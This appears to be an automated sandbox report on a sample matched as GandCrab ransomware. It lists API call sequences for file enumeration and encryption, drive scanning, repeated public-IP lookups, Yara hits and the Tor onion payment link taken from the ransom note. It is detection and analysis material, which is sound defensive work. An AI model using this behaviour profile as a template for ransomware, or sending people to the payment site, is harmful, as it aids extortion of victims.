Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB8400 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,	12_2_0FBB8400
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB5670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,	12_2_0FBB5670
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB6660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	12_2_0FBB6660

Source: mPNVrHIpyt.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: mPNVrHIpyt.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH

Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: z:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: x:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: v:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: t:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: r:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: p:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: n:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: l:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: j:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: h:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: f:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: b:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: y:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: w:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: u:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: s:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: q:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: o:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: m:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: k:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: i:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: g:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: e:
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	File opened: a:

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F696DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	0_2_0F696DF0
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F696BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	0_2_0F696BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB6BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	11_2_0FBB6BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB6DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	11_2_0FBB6DF0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB6BA0 lstrlenW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcatW,lstrlenW,lstrcmpW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,lstrlenA,VirtualFree,CloseHandle,lstrcmpW,FindNextFileW,FindClose,	12_2_0FBB6BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB6DF0 lstrlenW,lstrcatW,lstrcatW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcatW,lstrcatW,lstrcatW,FindNextFileW,FindClose,	12_2_0FBB6DF0

Networking

Contains functionality to determine the online IP of the system

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F696FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	0_2_0F696FF0
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	Code function: 0_2_0F696FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	0_2_0F696FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB6FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	11_2_0FBB6FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 11_2_0FBB6FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	11_2_0FBB6FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB6FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	12_2_0FBB6FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	Code function: 12_2_0FBB6FF0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	12_2_0FBB6FF0

Found Tor onion address

Source: mPNVrHIpyt.exe, 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 0000000D.00000002.357333770.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 0000000F.00000002.385057695.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 00000012.00000002.407272016.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 00000016.00000002.444732494.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 00000019.00000002.471339306.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 0000001C.00000002.511353636.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 0000001F.00000002.547100256.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 00000021.00000002.567450621.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 00000027.00000002.606206614.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b

May check the online IP address of the machine

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\mPNVrHIpyt.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com
Source: unknown	DNS query: name: ipv4bot.whatismyipaddress.com

Source: mPNVrHIpyt.exe, 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmp, wzltxa.exe, 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000D.00000002.357333770.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000F.00000002.385057695.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000012.00000002.407272016.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000016.00000002.444732494.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000019.00000002.471339306.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001C.00000002.511353636.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001F.00000002.547100256.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000021.00000002.567450621.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000027.00000002.606206614.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: http://gdcbmuveqjsli57x.onion/cd05fa18e84d425b
Source: wzltxa.exe, 00000027.00000002.605442747.00000000016F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/
Source: wzltxa.exe, 0000000D.00000002.356865636.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/%
Source: wzltxa.exe, 0000001C.00000002.510519508.0000000001098000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/)
Source: wzltxa.exe, 0000001C.00000003.509113143.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 0000001C.00000002.510669459.00000000010D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/.
Source: wzltxa.exe, 00000012.00000002.406611615.00000000012A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/0
Source: wzltxa.exe, 0000000D.00000002.356865636.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/3
Source: wzltxa.exe, 0000001F.00000002.546253684.0000000001488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/5
Source: wzltxa.exe, 0000000D.00000002.356925187.0000000000D13000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 00000027.00000002.605442747.00000000016F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/6
Source: wzltxa.exe, 0000000F.00000002.384119850.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/E:
Source: mPNVrHIpyt.exe, 00000000.00000002.280964753.0000000001549000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/K
Source: wzltxa.exe, 0000000B.00000002.319600520.00000000010EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/S
Source: wzltxa.exe, 00000021.00000002.566573715.0000000000758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/T
Source: wzltxa.exe, 00000012.00000002.406711705.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 00000012.00000003.405938163.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, wzltxa.exe, 0000001F.00000002.546525436.00000000014C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/Y
Source: mPNVrHIpyt.exe, 00000000.00000002.280964753.0000000001549000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/Z
Source: wzltxa.exe, 0000001F.00000002.546253684.0000000001488000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/a
Source: wzltxa.exe, 00000016.00000002.443945557.0000000000E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/nxD
Source: wzltxa.exe, 00000016.00000002.443945557.0000000000E78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/pxV
Source: wzltxa.exe, 0000000B.00000002.319600520.00000000010EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/r
Source: mPNVrHIpyt.exe, 00000000.00000002.280964753.0000000001549000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/u
Source: mPNVrHIpyt.exe, 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmp, wzltxa.exe, 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000D.00000002.357333770.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000F.00000002.385057695.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000012.00000002.407272016.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000016.00000002.444732494.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000019.00000002.471339306.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001C.00000002.511353636.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001F.00000002.547100256.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000021.00000002.567450621.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000027.00000002.606206614.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: https://tox.chat/download.html
Source: mPNVrHIpyt.exe, 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmp, wzltxa.exe, 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000D.00000002.357333770.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000000F.00000002.385057695.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000012.00000002.407272016.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000016.00000002.444732494.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000019.00000002.471339306.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001C.00000002.511353636.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 0000001F.00000002.547100256.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000021.00000002.567450621.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, wzltxa.exe, 00000027.00000002.606206614.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.torproject.org/

Source: unknown

DNS traffic detected: queries for: ipv4bot.whatismyipaddress.com

Source: C:\Users\user\Desktop\mPNVrHIpyt.exe

Code function: 0_2_0F698050 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,

0_2_0F698050

Source: wzltxa.exe, 0000000B.00000002.319600520.00000000010EA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Yara detected Gandcrab

Source: Yara match	File source: 33.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000002.407272016.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.471339306.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.606206614.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.444732494.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.511353636.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.357333770.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.547100256.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.567450621.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.385057695.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mPNVrHIpyt.exe PID: 3592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 1276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 1920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 4616, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 6136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 1356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 6016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wzltxa.exe PID: 5520, type: MEMORYSTR
